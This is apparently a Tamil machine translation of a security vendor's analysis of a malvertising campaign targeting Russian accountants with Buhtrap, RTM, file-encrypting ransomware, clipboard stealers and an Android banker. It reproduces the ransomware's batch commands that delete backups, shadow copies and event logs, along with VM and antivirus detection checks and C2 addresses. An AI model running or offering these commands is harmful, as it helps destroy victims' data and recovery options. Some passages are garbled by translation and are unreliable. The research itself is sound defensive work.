இணையத் தாக்குதலில் கணக்காளர்களைக் குறிவைக்க, அவர்கள் ஆன்லைனில் தேடும் பணி ஆவணங்களைப் பயன்படுத்தலாம். கடந்த சில மாதங்களாக அறியப்பட்ட பின்கதவுகளை விநியோகிக்கும் ஒரு சைபர் குழு இதைத்தான் தோராயமாக செய்து வருகிறது. и , அத்துடன் மறைகுறியாக்கிகள் மற்றும் கிரிப்டோகரன்சிகளை திருடுவதற்கான மென்பொருள். பெரும்பாலான இலக்குகள் ரஷ்யாவில் அமைந்துள்ளன. Yandex.Direct இல் தீங்கிழைக்கும் விளம்பரங்களை வைத்து தாக்குதல் நடத்தப்பட்டது. சாத்தியமான பாதிக்கப்பட்டவர்கள் ஒரு வலைத்தளத்திற்கு அனுப்பப்பட்டனர், அங்கு அவர்கள் ஒரு ஆவண டெம்ப்ளேட்டாக மாறுவேடமிட்ட தீங்கிழைக்கும் கோப்பை பதிவிறக்கம் செய்யுமாறு கேட்டுக்கொள்ளப்பட்டனர். எங்கள் எச்சரிக்கைக்குப் பிறகு யாண்டெக்ஸ் தீங்கிழைக்கும் விளம்பரத்தை அகற்றியது.
Buhtrap இன் மூலக் குறியீடு கடந்த காலங்களில் ஆன்லைனில் கசிந்ததால், அதை யார் வேண்டுமானாலும் பயன்படுத்தலாம். RTM குறியீடு கிடைப்பது குறித்து எங்களிடம் எந்த தகவலும் இல்லை.
இந்த இடுகையில், தாக்குபவர்கள் Yandex.Direct ஐப் பயன்படுத்தி தீம்பொருளை எவ்வாறு விநியோகித்தார்கள் மற்றும் அதை GitHub இல் ஹோஸ்ட் செய்தார்கள் என்பதை நாங்கள் உங்களுக்குக் கூறுவோம். தீம்பொருளின் தொழில்நுட்ப பகுப்பாய்வுடன் இடுகை முடிவடையும்.
Buhtrap மற்றும் RTM மீண்டும் வணிகத்தில் உள்ளன
பரவல் மற்றும் பாதிக்கப்பட்டவர்களின் வழிமுறை
பாதிக்கப்பட்டவர்களுக்கு வழங்கப்படும் பல்வேறு பேலோடுகள் பொதுவான பரவல் பொறிமுறையைப் பகிர்ந்து கொள்கின்றன. தாக்குபவர்களால் உருவாக்கப்பட்ட அனைத்து தீங்கிழைக்கும் கோப்புகளும் இரண்டு வெவ்வேறு GitHub களஞ்சியங்களில் வைக்கப்பட்டன.
பொதுவாக, களஞ்சியத்தில் ஒரு தரவிறக்கம் செய்யக்கூடிய தீங்கிழைக்கும் கோப்பு உள்ளது, அது அடிக்கடி மாறும். ஒரு களஞ்சியத்தில் ஏற்பட்ட மாற்றங்களின் வரலாற்றைக் காண GitHub உங்களை அனுமதிப்பதால், ஒரு குறிப்பிட்ட காலகட்டத்தில் என்ன மால்வேர் விநியோகிக்கப்பட்டது என்பதைப் பார்க்கலாம். தீங்கிழைக்கும் கோப்பைப் பதிவிறக்கம் செய்ய பாதிக்கப்பட்டவரை சமாதானப்படுத்த, மேலே உள்ள படத்தில் காட்டப்பட்டுள்ள blanki-shabloni24[.]ru என்ற இணையதளம் பயன்படுத்தப்பட்டது.
தளத்தின் வடிவமைப்பு மற்றும் தீங்கிழைக்கும் கோப்புகளின் அனைத்து பெயர்களும் ஒரே கருத்தைப் பின்பற்றுகின்றன - படிவங்கள், டெம்ப்ளேட்கள், ஒப்பந்தங்கள், மாதிரிகள் போன்றவை. கடந்த காலங்களில் கணக்காளர்கள் மீதான தாக்குதல்களில் Buhtrap மற்றும் RTM மென்பொருள்கள் ஏற்கனவே பயன்படுத்தப்பட்டுள்ளன என்பதைக் கருத்தில் கொண்டு, புதிய பிரச்சாரத்தில் மூலோபாயம் அதே தான். பாதிக்கப்பட்டவர் எப்படி தாக்குபவர்களின் இணையதளத்திற்கு வந்தார் என்பதுதான் ஒரே கேள்வி.
தொற்று
இந்தத் தளத்தில் முடிவடைந்த குறைந்தது பல சாத்தியமான பாதிக்கப்பட்டவர்கள் தீங்கிழைக்கும் விளம்பரத்தால் ஈர்க்கப்பட்டனர். கீழே ஒரு எடுத்துக்காட்டு URL உள்ளது:
https://blanki-shabloni24.ru/?utm_source=yandex&utm_medium=banner&utm_campaign=cid|{blanki_rsya}|context&utm_content=gid|3590756360|aid|6683792549|15114654950_&utm_term=скачать бланк счета&pm_source=bb.f2.kz&pm_block=none&pm_position=0&yclid=1029648968001296456
நீங்கள் இணைப்பிலிருந்து பார்க்க முடியும் என, பேனர் முறையான கணக்கியல் மன்றத்தில் bb.f2[.]kz இல் வெளியிடப்பட்டது. பேனர்கள் வெவ்வேறு தளங்களில் தோன்றியவை, அனைத்திலும் ஒரே பிரச்சார ஐடி (blanki_rsya) மற்றும் கணக்கியல் அல்லது சட்ட உதவி சேவைகளுடன் தொடர்புடையவை என்பதை கவனத்தில் கொள்ள வேண்டும். இலக்கு தாக்குதல்கள் பற்றிய எங்கள் கருதுகோளை ஆதரிக்கும் "விலைப்பட்டியல் படிவத்தைப் பதிவிறக்கு" என்ற கோரிக்கையை பாதிக்கப்பட்டவர் பயன்படுத்தியதாக URL காட்டுகிறது. பேனர்கள் தோன்றிய தளங்கள் மற்றும் தொடர்புடைய தேடல் வினவல்கள் கீழே உள்ளன.
- விலைப்பட்டியல் படிவத்தைப் பதிவிறக்கவும் - bb.f2[.]kz
- மாதிரி ஒப்பந்தம் - Ipopen[.]ru
- விண்ணப்ப புகார் மாதிரி - 77metrov[.]ru
- ஒப்பந்த வடிவம் - வெற்று-டோகோவோர்-குப்ளி-ப்ரோடாழி[.]ரு
- மாதிரி நீதிமன்ற மனு - zen.yandex[.]ru
- மாதிரி புகார் - yurday[.]ru
- மாதிரி ஒப்பந்த படிவங்கள் – Regforum[.]ru
- ஒப்பந்த வடிவம் - உதவி[.]ru
- மாதிரி அபார்ட்மெண்ட் ஒப்பந்தம் - napravah[.]com
- சட்ட ஒப்பந்தங்களின் மாதிரிகள் - avito[.]ru
blanki-shabloni24[.]ru தளம் ஒரு எளிய காட்சி மதிப்பீட்டை அனுப்ப கட்டமைக்கப்பட்டிருக்கலாம். பொதுவாக, GitHub இணைப்புடன் தொழில்முறை தோற்றமுடைய தளத்தை சுட்டிக்காட்டும் விளம்பரம் வெளிப்படையாக மோசமாகத் தெரியவில்லை. கூடுதலாக, தாக்குபவர்கள் தீங்கிழைக்கும் கோப்புகளை களஞ்சியத்தில் ஒரு குறிப்பிட்ட காலத்திற்கு மட்டுமே பதிவேற்றியிருக்கலாம், இது பிரச்சாரத்தின் போது இருக்கலாம். பெரும்பாலான நேரங்களில், GitHub களஞ்சியத்தில் வெற்று ஜிப் காப்பகம் அல்லது வெற்று EXE கோப்பு இருக்கும். இதனால், தாக்குபவர்கள் குறிப்பிட்ட தேடல் வினவல்களுக்கு பதிலளிக்கும் வகையில் வந்த கணக்காளர்கள் பெரும்பாலும் பார்வையிடும் தளங்களில் Yandex.Direct மூலம் விளம்பரங்களை விநியோகிக்க முடியும்.
அடுத்து, இவ்வாறு விநியோகிக்கப்படும் பல்வேறு பேலோடுகளைப் பார்ப்போம்.
பேலோட் பகுப்பாய்வு
விநியோகத்தின் காலவரிசை
தீங்கிழைக்கும் பிரச்சாரம் அக்டோபர் 2018 இறுதியில் தொடங்கியது மற்றும் எழுதும் நேரத்தில் செயலில் உள்ளது. முழு களஞ்சியமும் கிட்ஹப்பில் பொதுவில் கிடைப்பதால், ஆறு வெவ்வேறு மால்வேர் குடும்பங்களின் விநியோகத்தின் துல்லியமான காலவரிசையைத் தொகுத்துள்ளோம் (கீழே உள்ள படத்தைப் பார்க்கவும்). கிட் வரலாற்றுடன் ஒப்பிடுவதற்காக, ESET டெலிமெட்ரி மூலம் அளவிடப்பட்ட பேனர் இணைப்பு எப்போது கண்டுபிடிக்கப்பட்டது என்பதைக் காட்டும் வரியைச் சேர்த்துள்ளோம். நீங்கள் பார்க்க முடியும் என, இது GitHub இல் உள்ள பேலோடின் கிடைக்கும் தன்மையுடன் நன்றாக தொடர்புடையது. பிப்ரவரி மாத இறுதியில் உள்ள முரண்பாட்டை, மாற்ற வரலாற்றின் ஒரு பகுதி எங்களிடம் இல்லை என்பதன் மூலம் விளக்கலாம், ஏனெனில் களஞ்சியத்தை முழுமையாகப் பெறுவதற்கு முன்பு GitHub இலிருந்து அகற்றப்பட்டது.
படம் 1. தீம்பொருள் விநியோகத்தின் காலவரிசை.
குறியீடு கையொப்பமிடும் சான்றிதழ்கள்
பிரச்சாரம் பல சான்றிதழ்களைப் பயன்படுத்தியது. சில ஒன்றுக்கு மேற்பட்ட தீம்பொருள் குடும்பங்களால் கையொப்பமிடப்பட்டுள்ளன, இது வெவ்வேறு மாதிரிகள் ஒரே பிரச்சாரத்தைச் சேர்ந்தவை என்பதை மேலும் குறிக்கிறது. தனிப்பட்ட விசை கிடைத்தாலும், ஆபரேட்டர்கள் பைனரிகளில் முறையாக கையொப்பமிடவில்லை மற்றும் அனைத்து மாதிரிகளுக்கும் விசையைப் பயன்படுத்தவில்லை. பிப்ரவரி 2019 இன் பிற்பகுதியில், தாக்குபவர்கள் தனிப்பட்ட விசை இல்லாத Google-க்குச் சொந்தமான சான்றிதழைப் பயன்படுத்தி தவறான கையொப்பங்களை உருவாக்கத் தொடங்கினர்.
பிரச்சாரத்தில் ஈடுபட்டுள்ள அனைத்து சான்றிதழ்களும், அவர்கள் கையொப்பமிடும் தீம்பொருள் குடும்பங்களும் கீழே உள்ள அட்டவணையில் பட்டியலிடப்பட்டுள்ளன.
பிற தீம்பொருள் குடும்பங்களுடன் இணைப்புகளை ஏற்படுத்த இந்தக் குறியீடு கையொப்பமிடும் சான்றிதழ்களைப் பயன்படுத்தியுள்ளோம். பெரும்பாலான சான்றிதழ்களுக்கு, GitHub களஞ்சியத்தின் மூலம் விநியோகிக்கப்படாத மாதிரிகளை நாங்கள் கண்டறியவில்லை. இருப்பினும், போட்நெட்டிற்குச் சொந்தமான தீம்பொருளில் கையொப்பமிட TOV “மரியா” சான்றிதழ் பயன்படுத்தப்பட்டது , ஆட்வேர் மற்றும் சுரங்கத் தொழிலாளர்கள். இந்த மால்வேர் இந்த பிரச்சாரத்துடன் தொடர்புடையதாக இருக்க வாய்ப்பில்லை. பெரும்பாலும், சான்றிதழ் டார்க்நெட்டில் வாங்கப்பட்டது.
Win32/Filecoder.Buhtrap
புதிதாகக் கண்டுபிடிக்கப்பட்ட Win32/Filecoder.Buhtrap என்பது நம் கவனத்தை ஈர்த்த முதல் கூறு. இது ஒரு டெல்பி பைனரி கோப்பு, இது சில நேரங்களில் தொகுக்கப்படுகிறது. இது முக்கியமாக பிப்ரவரி-மார்ச் 2019 இல் விநியோகிக்கப்பட்டது. இது ஒரு ransomware நிரலுக்கு ஏற்றவாறு செயல்படுகிறது - இது உள்ளூர் இயக்கிகள் மற்றும் பிணைய கோப்புறைகளைத் தேடுகிறது மற்றும் கண்டறியப்பட்ட கோப்புகளை குறியாக்குகிறது. குறியாக்க விசைகளை அனுப்ப சர்வரை தொடர்பு கொள்ளாததால், சமரசம் செய்ய இணைய இணைப்பு தேவையில்லை. அதற்கு பதிலாக, மீட்கும் செய்தியின் முடிவில் "டோக்கன்" சேர்க்கிறது, மேலும் ஆபரேட்டர்களைத் தொடர்புகொள்ள மின்னஞ்சல் அல்லது பிட்மெசேஜைப் பயன்படுத்த பரிந்துரைக்கிறது.
முடிந்தவரை பல முக்கிய ஆதாரங்களை என்க்ரிப்ட் செய்ய, Filecoder.Buhtrap ஆனது முக்கிய மென்பொருளை மூடுவதற்கு வடிவமைக்கப்பட்ட ஒரு நூலை இயக்குகிறது, இது குறியாக்கத்தில் குறுக்கிடக்கூடிய மதிப்புமிக்க தகவல்களைக் கொண்ட திறந்த கோப்பு கையாளுபவர்களைக் கொண்டிருக்கலாம். இலக்கு செயல்முறைகள் முக்கியமாக தரவுத்தள மேலாண்மை அமைப்புகள் (DBMS). கூடுதலாக, Filecoder.Buhtrap தரவு மீட்டெடுப்பை கடினமாக்குவதற்கு பதிவு கோப்புகள் மற்றும் காப்புப்பிரதிகளை நீக்குகிறது. இதைச் செய்ய, கீழே உள்ள தொகுதி ஸ்கிரிப்டை இயக்கவும்.
bcdedit /set {default} bootstatuspolicy ignoreallfailures
bcdedit /set {default} recoveryenabled no
wbadmin delete catalog -quiet
wbadmin delete systemstatebackup
wbadmin delete systemstatebackup -keepversions:0
wbadmin delete backup
wmic shadowcopy delete
vssadmin delete shadows /all /quiet
reg delete "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientDefault" /va /f
reg delete "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers" /f
reg add "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers"
attrib "%userprofile%documentsDefault.rdp" -s -h
del "%userprofile%documentsDefault.rdp"
wevtutil.exe clear-log Application
wevtutil.exe clear-log Security
wevtutil.exe clear-log System
sc config eventlog start=disabled
Filecoder.Buhtrap இணையத்தள பார்வையாளர்களைப் பற்றிய தகவல்களைச் சேகரிக்க வடிவமைக்கப்பட்ட முறையான ஆன்லைன் ஐபி லாக்கர் சேவையைப் பயன்படுத்துகிறது. இது கட்டளை வரியின் பொறுப்பான ransomware பாதிக்கப்பட்டவர்களைக் கண்காணிக்கும் நோக்கம் கொண்டது:
mshta.exe "javascript:document.write('');"
மூன்று விலக்கு பட்டியல்களுடன் பொருந்தவில்லை என்றால், குறியாக்கத்திற்கான கோப்புகள் தேர்ந்தெடுக்கப்படும். முதலாவதாக, பின்வரும் நீட்டிப்புகளைக் கொண்ட கோப்புகள் குறியாக்கம் செய்யப்படவில்லை: .com, .cmd, .cpl, .dll, .exe, .hta, .lnk, .msc, .msi, .msp, .pif, .scr, .sys மற்றும் .மட்டை இரண்டாவதாக, கீழே உள்ள பட்டியலில் இருந்து முழு பாதையில் அடைவு சரங்களைக் கொண்டிருக்கும் அனைத்து கோப்புகளும் விலக்கப்பட்டுள்ளன.
.{ED7BA470-8E54-465E-825C-99712043E01C}
tor browser
opera
opera software
mozilla
mozilla firefox
internet explorer
googlechrome
google
boot
application data
apple computersafari
appdata
all users
:windows
:system volume information
:nvidia
:intel
மூன்றாவதாக, சில கோப்பு பெயர்கள் குறியாக்கத்திலிருந்து விலக்கப்பட்டுள்ளன, அவற்றுள் மீட்கும் செய்தியின் கோப்பு பெயர். பட்டியல் கீழே கொடுக்கப்பட்டுள்ளது. வெளிப்படையாக, இந்த விதிவிலக்குகள் அனைத்தும் இயந்திரத்தை இயக்குவதை நோக்கமாகக் கொண்டவை, ஆனால் குறைந்த சாலைத் தகுதியுடன்.
boot.ini
bootfont.bin
bootsect.bak
desktop.ini
iconcache.db
ntdetect.com
ntldr
ntuser.dat
ntuser.dat.log
ntuser.ini
thumbs.db
winupas.exe
your files are now encrypted.txt
windows update assistant.lnk
master.exe
unlock.exe
unlocker.exe
கோப்பு குறியாக்க திட்டம்
செயல்படுத்தப்பட்டவுடன், தீம்பொருள் 512-பிட் RSA விசை ஜோடியை உருவாக்குகிறது. தனிப்பட்ட அடுக்கு (d) மற்றும் மாடுலஸ் (n) பின்னர் கடின-குறியிடப்பட்ட 2048-பிட் பொது விசை (பொது அடுக்கு மற்றும் மாடுலஸ்), zlib-பேக் மற்றும் அடிப்படை64 குறியாக்கம் மூலம் குறியாக்கம் செய்யப்படுகிறது. இதற்குக் காரணமான குறியீடு படம் 2 இல் காட்டப்பட்டுள்ளது.
படம் 2. 512-பிட் RSA விசை ஜோடி உருவாக்க செயல்முறையின் ஹெக்ஸ்-கதிர்கள் சிதைவின் முடிவு.
உருவாக்கப்பட்ட தனிப்பட்ட விசையுடன் கூடிய எளிய உரையின் எடுத்துக்காட்டு கீழே உள்ளது, இது மீட்கும் செய்தியுடன் இணைக்கப்பட்ட டோக்கன் ஆகும்.
DF9228F4F3CA93314B7EE4BEFC440030665D5A2318111CC3FE91A43D781E3F91BD2F6383E4A0B4F503916D75C9C576D5C2F2F073ADD4B237F7A2B3BF129AE2F399197ECC0DD002D5E60C20CE3780AB9D1FE61A47D9735036907E3F0CF8BE09E3E7646F8388AAC75FF6A4F60E7F4C2F697BF6E47B2DBCDEC156EAD854CADE53A239
தாக்குபவர்களின் பொது விசை கீழே கொடுக்கப்பட்டுள்ளது.
e = 0x72F750D7A93C2C88BFC87AD4FC0BF4CB45E3C55701FA03D3E75162EB5A97FDA7ACF8871B220A33BEDA546815A9AD9AA0C2F375686F5009C657BB3DF35145126C71E3C2EADF14201C8331699FD0592C957698916FA9FEA8F0B120E4296193AD7F3F3531206608E2A8F997307EE7D14A9326B77F1B34C4F1469B51665757AFD38E88F758B9EA1B95406E72B69172A7253F1DFAA0FA02B53A2CC3A7F0D708D1A8CAA30D954C1FEAB10AD089EFB041DD016DCAAE05847B550861E5CACC6A59B112277B60AC0E4E5D0EA89A5127E93C2182F77FDA16356F4EF5B7B4010BCCE1B1331FCABFFD808D7DAA86EA71DFD36D7E701BD0050235BD4D3F20A97AAEF301E785005
n = 0x212ED167BAC2AEFF7C3FA76064B56240C5530A63AB098C9B9FA2DE18AF9F4E1962B467ABE2302C818860F9215E922FC2E0E28C0946A0FC746557722EBB35DF432481AC7D5DDF69468AF1E952465E61DDD06CDB3D924345A8833A7BC7D5D9B005585FE95856F5C44EA917306415B767B684CC85E7359C23231C1DCBBE714711C08848BEB06BD287781AEB53D94B7983EC9FC338D4320129EA4F568C410317895860D5A85438B2DA6BB3BAAE9D9CE65BCEA6760291D74035775F28DF4E6AB1A748F78C68AB07EA166A7309090202BB3F8FBFC19E44AC0B4D3D0A37C8AA5FA90221DA7DB178F89233E532FF90B55122B53AB821E1A3DB0F02524429DEB294B3A4EDD
கோப்புகள் 128-பிட் விசையுடன் AES-256-CBC ஐப் பயன்படுத்தி குறியாக்கம் செய்யப்படுகின்றன. ஒவ்வொரு மறைகுறியாக்கப்பட்ட கோப்பிற்கும், ஒரு புதிய விசை மற்றும் புதிய துவக்க திசையன் உருவாக்கப்படும். மறைகுறியாக்கப்பட்ட கோப்பின் முடிவில் முக்கிய தகவல்கள் சேர்க்கப்படும். மறைகுறியாக்கப்பட்ட கோப்பின் வடிவமைப்பைக் கருத்தில் கொள்வோம்.
மறைகுறியாக்கப்பட்ட கோப்புகள் பின்வரும் தலைப்புகளைக் கொண்டுள்ளன:
VEGA மேஜிக் மதிப்புடன் கூடிய மூல கோப்பு தரவு முதல் 0x5000 பைட்டுகளுக்கு குறியாக்கம் செய்யப்படுகிறது. அனைத்து மறைகுறியாக்க தகவல்களும் பின்வரும் அமைப்புடன் ஒரு கோப்பில் இணைக்கப்பட்டுள்ளன:
- கோப்பு அளவு மார்க்கரில் கோப்பு அளவு 0x5000 பைட்டுகளை விட பெரியதா என்பதைக் குறிக்கும் குறி உள்ளது.
— AES கீ ப்ளாப் = ZlibCompress(RSAEncrypt(AES கீ + IV, உருவாக்கப்பட்ட RSA விசை ஜோடியின் பொது விசை))
- RSA கீ ப்ளாப் = ZlibCompress(RSAEncrypt(உருவாக்கப்பட்ட RSA தனிப்பட்ட விசை, கடின குறியிடப்பட்ட RSA பொது விசை))
Win32/ClipBanker
Win32/ClipBanker என்பது அக்டோபர் பிற்பகுதியிலிருந்து டிசம்பர் 2018 தொடக்கம் வரை இடையிடையே விநியோகிக்கப்படும் ஒரு அங்கமாகும். கிளிப்போர்டின் உள்ளடக்கங்களைக் கண்காணிப்பதே இதன் பங்கு, இது கிரிப்டோகரன்சி பணப்பைகளின் முகவரிகளைத் தேடுகிறது. இலக்கு வாலட் முகவரியை தீர்மானித்த பிறகு, ClipBanker அதை ஆபரேட்டர்களுக்கு சொந்தமானது என்று நம்பப்படும் முகவரியுடன் மாற்றுகிறது. நாங்கள் ஆய்வு செய்த மாதிரிகள் பெட்டி அல்லது தெளிவற்றவை அல்ல. நடத்தை மறைப்பதற்கு பயன்படுத்தப்படும் ஒரே வழிமுறை சரம் குறியாக்கம் ஆகும். ஆபரேட்டர் வாலட் முகவரிகள் RC4 ஐப் பயன்படுத்தி குறியாக்கம் செய்யப்படுகின்றன. இலக்கு கிரிப்டோகரன்சிகள் பிட்காயின், பிட்காயின் ரொக்கம், டாக்காயின், எத்தேரியம் மற்றும் சிற்றலை.
தீம்பொருள் தாக்குபவர்களின் பிட்காயின் பணப்பைகளுக்கு பரவிய காலகட்டத்தில், ஒரு சிறிய தொகை VTS க்கு அனுப்பப்பட்டது, இது பிரச்சாரத்தின் வெற்றியில் சந்தேகத்தை ஏற்படுத்துகிறது. கூடுதலாக, இந்த பரிவர்த்தனைகள் ClipBanker உடன் தொடர்புடையவை என்பதற்கான எந்த ஆதாரமும் இல்லை.
Win32/RTM
Win32/RTM பாகம் மார்ச் 2019 தொடக்கத்தில் பல நாட்களுக்கு விநியோகிக்கப்பட்டது. RTM என்பது டெல்பியில் எழுதப்பட்ட ஒரு ட்ரோஜன் வங்கியாளர் ஆகும், இது தொலை வங்கி அமைப்புகளை இலக்காகக் கொண்டது. 2017 இல், ESET ஆராய்ச்சியாளர்கள் வெளியிட்டனர் இந்த திட்டத்தின் விளக்கம் இன்னும் பொருத்தமானது. ஜனவரி 2019 இல், பாலோ ஆல்டோ நெட்வொர்க்குகளும் வெளியிடப்பட்டன .
புஹ்ட்ராப் ஏற்றி
சில காலத்திற்கு, முந்தைய Buhtrap கருவிகளைப் போல் இல்லாத ஒரு டவுன்லோடர் கிட்ஹப்பில் இருந்தது. அவர் திரும்புகிறார் https://94.100.18[.]67/RSS.php?<some_id> அடுத்த கட்டத்தைப் பெற மற்றும் அதை நேரடியாக நினைவகத்தில் ஏற்றுகிறது. இரண்டாம் நிலை குறியீட்டின் இரண்டு நடத்தைகளை நாம் வேறுபடுத்தி அறியலாம். முதல் URL இல், RSS.php நேரடியாக Buhtrap பின்கதவைக் கடந்து சென்றது - இந்த பின்கதவு மூலக் குறியீடு கசிந்த பிறகு கிடைக்கும் கதவுக்கு மிகவும் ஒத்திருக்கிறது.
சுவாரஸ்யமாக, Buhtrap பின்கதவுடன் பல பிரச்சாரங்களை நாங்கள் காண்கிறோம், மேலும் அவை வெவ்வேறு ஆபரேட்டர்களால் இயக்கப்படுவதாகக் கூறப்படுகிறது. இந்த வழக்கில், முக்கிய வேறுபாடு என்னவென்றால், பின்புற கதவு நேரடியாக நினைவகத்தில் ஏற்றப்படுகிறது மற்றும் நாங்கள் பேசிய DLL வரிசைப்படுத்தல் செயல்முறையுடன் வழக்கமான திட்டத்தைப் பயன்படுத்துவதில்லை. . கூடுதலாக, ஆபரேட்டர்கள் பிணைய போக்குவரத்தை C&C சேவையகத்திற்கு குறியாக்கப் பயன்படுத்தப்படும் RC4 விசையை மாற்றியுள்ளனர். நாம் பார்த்த பெரும்பாலான பிரச்சாரங்களில், இந்த விசையை மாற்றுவதில் ஆபரேட்டர்கள் கவலைப்படவில்லை.
இரண்டாவது, மிகவும் சிக்கலான நடத்தை RSS.php URL மற்றொரு ஏற்றிக்கு அனுப்பப்பட்டது. டைனமிக் இறக்குமதி அட்டவணையை மீண்டும் உருவாக்குவது போன்ற சில குழப்பங்களை இது செயல்படுத்தியது. துவக்க ஏற்றியின் நோக்கம் C&C சேவையகத்தைத் தொடர்புகொள்வதாகும் [.]com/api/F27F84EDA4D13B15/2, பதிவுகளை அனுப்பி பதிலுக்காக காத்திருக்கவும். இது பதிலை ஒரு குமிழியாக செயலாக்குகிறது, அதை நினைவகத்தில் ஏற்றுகிறது மற்றும் அதை செயல்படுத்துகிறது. இந்த லோடரை இயக்குவதை நாங்கள் பார்த்த பேலோட் அதே Buhtrap பின்கதவாக இருந்தது, ஆனால் மற்ற கூறுகள் இருக்கலாம்.
Android/Spy.Banker
சுவாரஸ்யமாக, ஆண்ட்ராய்டுக்கான ஒரு கூறு கிட்ஹப் களஞ்சியத்திலும் காணப்பட்டது. அவர் ஒரே ஒரு நாள் மட்டுமே பிரதான கிளையில் இருந்தார் - நவம்பர் 1, 2018. GitHub இல் இடுகையிடப்படுவதைத் தவிர, ESET டெலிமெட்ரி இந்த தீம்பொருள் விநியோகிக்கப்படுவதற்கான எந்த ஆதாரத்தையும் காணவில்லை.
கூறு Android பயன்பாட்டுத் தொகுப்பாக (APK) ஹோஸ்ட் செய்யப்பட்டது. இது மிகவும் குழப்பமாக உள்ளது. APK இல் உள்ள மறைகுறியாக்கப்பட்ட JAR இல் தீங்கிழைக்கும் நடத்தை மறைக்கப்பட்டுள்ளது. இந்த விசையைப் பயன்படுத்தி இது RC4 உடன் குறியாக்கம் செய்யப்படுகிறது:
key = [
0x87, 0xd6, 0x2e, 0x66, 0xc5, 0x8a, 0x26, 0x00, 0x72, 0x86, 0x72, 0x6f,
0x0c, 0xc1, 0xdb, 0xcb, 0x14, 0xd2, 0xa8, 0x19, 0xeb, 0x85, 0x68, 0xe1,
0x2f, 0xad, 0xbe, 0xe3, 0xb9, 0x60, 0x9b, 0xb9, 0xf4, 0xa0, 0xa2, 0x8b, 0x96
]
சரங்களை குறியாக்க அதே விசையும் அல்காரிதமும் பயன்படுத்தப்படுகின்றன. JAR இல் அமைந்துள்ளது APK_ROOT + image/files. கோப்பின் முதல் 4 பைட்டுகள் மறைகுறியாக்கப்பட்ட JAR இன் நீளத்தைக் கொண்டிருக்கின்றன, இது நீளப் புலத்திற்குப் பிறகு உடனடியாகத் தொடங்குகிறது.
கோப்பை மறைகுறியாக்கிய பிறகு, அது அனுபிஸ் என்பதை நாங்கள் கண்டுபிடித்தோம் - முன்பு ஆண்ட்ராய்டுக்கான வங்கியாளர். தீம்பொருள் பின்வரும் அம்சங்களைக் கொண்டுள்ளது:
- ஒலிவாங்கி பதிவு
- திரைக்காட்சிகளை எடுக்கிறது
- ஜிபிஎஸ் ஒருங்கிணைப்புகளைப் பெறுதல்
- கீலாக்கர்
- சாதன தரவு குறியாக்கம் மற்றும் மீட்கும் தேவை
- ஸ்பேம் அனுப்புகிறது
சுவாரஸ்யமாக, வங்கியாளர் மற்றொரு C&C சேவையகத்தைப் பெற ட்விட்டரை காப்புப் பிரதி தொடர்பு சேனலாகப் பயன்படுத்தினார். நாங்கள் பகுப்பாய்வு செய்த மாதிரி @JonesTrader கணக்கைப் பயன்படுத்தியது, ஆனால் பகுப்பாய்வு நேரத்தில் அது ஏற்கனவே தடுக்கப்பட்டது.
வங்கியாளர் Android சாதனத்தில் இலக்கு பயன்பாடுகளின் பட்டியலைக் கொண்டுள்ளார். சோபோஸ் ஆய்வில் பெறப்பட்ட பட்டியலை விட இது நீளமானது. பட்டியலில் பல வங்கி பயன்பாடுகள், Amazon மற்றும் eBay போன்ற ஆன்லைன் ஷாப்பிங் திட்டங்கள் மற்றும் கிரிப்டோகரன்சி சேவைகள் உள்ளன.
MSIL/ClipBanker.IH
இந்த பிரச்சாரத்தின் ஒரு பகுதியாக கடைசியாக விநியோகிக்கப்பட்டது .NET விண்டோஸ் இயங்கக்கூடியது, இது மார்ச் 2019 இல் தோன்றியது. ஆய்வு செய்யப்பட்ட பெரும்பாலான பதிப்புகள் ConfuserEx v1.0.0 உடன் தொகுக்கப்பட்டன. ClipBanker ஐப் போலவே, இந்தக் கூறுகளும் கிளிப்போர்டைப் பயன்படுத்துகின்றன. அவரது குறிக்கோள் பரந்த அளவிலான கிரிப்டோகரன்சிகள், அத்துடன் நீராவி மீதான சலுகைகள். கூடுதலாக, அவர் பிட்காயின் தனிப்பட்ட WIF விசையைத் திருட ஐபி லாகர் சேவையைப் பயன்படுத்துகிறார்.
பாதுகாப்பு வழிமுறைகள்
பிழைத்திருத்தம், டம்ப்பிங் மற்றும் சேதப்படுத்துதல் ஆகியவற்றைத் தடுப்பதில் கன்ஃப்யூசர்எக்ஸ் வழங்கும் நன்மைகளுக்கு மேலதிகமாக, வைரஸ் தடுப்பு தயாரிப்புகள் மற்றும் மெய்நிகர் இயந்திரங்களைக் கண்டறியும் திறனை உள்ளடக்கியது.
இது மெய்நிகர் கணினியில் இயங்குகிறதா என்பதைச் சரிபார்க்க, தீம்பொருள் உள்ளமைக்கப்பட்ட Windows WMI கட்டளை வரியை (WMIC) பயாஸ் தகவலைக் கோர பயன்படுத்துகிறது, அதாவது:
wmic bios
பின்னர் நிரல் கட்டளை வெளியீட்டை அலசுகிறது மற்றும் முக்கிய வார்த்தைகளைத் தேடுகிறது: VBOX, VirtualBox, XEN, qemu, bochs, VM.
வைரஸ் தடுப்பு தயாரிப்புகளைக் கண்டறிய, தீம்பொருள் விண்டோஸ் பாதுகாப்பு மையத்திற்கு விண்டோஸ் மேலாண்மை கருவி (WMI) கோரிக்கையை அனுப்புகிறது ManagementObjectSearcher கீழே காட்டப்பட்டுள்ளபடி API. Base64 இலிருந்து டிகோடிங் செய்த பிறகு அழைப்பு இதுபோல் தெரிகிறது:
ManagementObjectSearcher('rootSecurityCenter2', 'SELECT * FROM AntivirusProduct')
படம் 3. வைரஸ் தடுப்பு தயாரிப்புகளை கண்டறிவதற்கான செயல்முறை.
கூடுதலாக, தீம்பொருள் என்பதைச் சரிபார்க்கிறது , கிளிப்போர்டு தாக்குதல்களுக்கு எதிராகப் பாதுகாப்பதற்கான ஒரு கருவி மற்றும், இயங்கினால், அந்தச் செயல்பாட்டில் உள்ள அனைத்து த்ரெட்களையும் இடைநிறுத்தி, அதன் மூலம் பாதுகாப்பை முடக்குகிறது.
விடாமுயற்சி
